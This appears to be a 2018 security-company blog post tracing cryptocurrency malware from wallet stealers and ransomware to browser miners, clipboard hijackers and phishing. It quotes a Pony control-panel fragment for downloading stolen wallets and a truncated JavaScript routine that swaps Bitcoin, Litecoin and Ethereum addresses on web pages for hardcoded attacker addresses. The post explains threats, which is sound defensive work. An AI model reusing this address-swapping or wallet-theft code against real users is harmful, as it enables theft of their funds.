Cryptocurrency malware: an explosive mix!

Posted by Oscar Juárez - 04/05/2018

Since cryptocurrencies came on the scene in late 2008 and early 2009, new malware has gradually emerged that does its utmost to steal users’ wallets and cryptocurrencies. This malware, just like all the others, has steadily evolved, implementing new methods for achieving its goals, as we explain below.

Early cryptocurrency thefts were carried out using typical stealer malware, such as the Pony family, which had added a new module that was able to extract the private passwords of the wallets located in the victim’s device. Shown below is a fragment of code from a control panel that enables the hacker to download all the stolen private passwords into a zip file.

if ($admin_routine == 'download_wallet' && $admin_action == 'other'){ 
    set_common_file_download_header('', 'application/zip'); 
    $pony_db -> get_wallet_zip(); 

After a while, new more effective methods cropped up and, as the reader may already know, we’re referring to the notorious Ransomware. Just to remind you, the main aim of this malware is to encrypt all of an infected machine’s files and demand a ransom in exchange, usually in Bitcoins.


This type of malware has been, and is, extremely successful, which is why countless variants have sprung up. But, as always occurs, when another form of malware is developed, new technologies also materialize to mitigate it so, even though cybercriminals have not discarded Ransomware, they have evolved by creating other types.

Close on the heels of Ransomware, malware samples began emerging whose purpose was to introduce Javascript mining onto all the webpages we browse, so that infected users are mining continuously while they are surfing the Internet.


In the early stages, this injection was carried out by infecting the device but, later on, these injections also appeared via browser add-ons and the websites themselves even began inserting them in order to reap rewards that were an alternative to the traditional ads they display.

Nevertheless, as occurred with Ransomware, anti-mining measures were developed and many popular Adblockers managed to block the webpages from where the Javascript was loaded.

Criminals had to reinvent themselves again, and they began injecting Javascript code into infected machines’ browsers so that when the user navigated to a webpage that contained a cryptocurrency wallet address, they would replace that address with a spoofed one.

Shown below is a fragment of Javascript code where an attempt is made to change the addresses of the Litecoin, Ethereum and Bitcoin currencies.

function init() {
    var a = document.documentElement.innerHTML;
    str = a.replace(/<.*?>/g, " ") .replace(/ +/g, " ");
    str = str.split(" ") .filter(function(a) {
    return (a = a.match(/(\w+)/)) && 24 < a[0].length
    .join(" ");
    var b = str.split(" ");

    for (a = 0; a < b.length; a++) 1 == checkBtc(b[a]) ? "L" == b[a].substring(0, 1) ? (document.body.innerHTML = document.body.innerHTML.replace(b[a], "LKyKqLVy6KgyCYekftCHFTBLYiZyUvxtsG"), document.body.innerHTML = document.body.innerHTML.replace(b[a], "LKyKqLVy6KgyCYekftCHFTBLYiZyUvxtsG")) : (document.body.innerHTML = document.body.innerHTML.replace(b[a], "17bH1SYLoBdGsBaDedPR2EE3JUt8oRS7qd"), document.body.innerHTML = document.body.innerHTML.replace(b[a], "17bH1SYLoBdGsBaDedPR2EE3JUt8oRS7qd")) : 1 == checkEth(b[a]) && (document.body.innerHTML = document.body.innerHTML.replace(b[a], "0xa05AeF9CA4828A71f84d284F7A25A7Aa6D2fe114"), document.body.innerHTML = document.body.innerHTML.replace(b[a], "0xa05AeF9CA4828A71f84d284F7A25A7Aa6D2fe114"))

function checkEth(a) {
      return !!/^(0x)?[0-9a-f]{40}$/i.test(a) && (/^(0x)?[0-9a-f]{40}$/.test(a) || /^(0x)?[0-9A-F]{40}$/.test(a), !0)
function checkBtc(a) {
      return !(26 > a.length || 35 < a.length) && !!/^[A-Z0-9]+$/i.test(a)


Another variant that has recently sprung up is similar to the address change that occurs in the browser but, on this occasion, via the clipboard. In this way, when users copy their wallet address to carry out some action, the malware will change this address for its own. This is the case of the recently-discovered Evrial, to name but a few.

criptomonedas-02Moreover, all types of cryptocurrency malware and several methods for thieving from users still resort to popular online fraud techniques, such as phishing linked to intensive spam campaigns, where social engineering techniques are implemented to attempt to dupe users into entering their credentials for different exchanges and stealing the cryptocurrencies they possess.

It is obvious that this is just the beginning and new mitigations will be masterminded to prevent users from having their cryptocurrencies stolen, but what other cryptocurrency theft techniques and methods are waiting in the wings?

Deep Learning for Online Fraud Prevention

Topics: online fraud, cryptocurrency theft, cryptocurrency malware

Recent Posts

Cryptocurrency malware: an explosive mix!

read more

The world’s top 3 cybercrime and online fraud hotspots

read more

Cybercriminals in the Financial Sector: Understanding the culprits behind the keystrokes

read more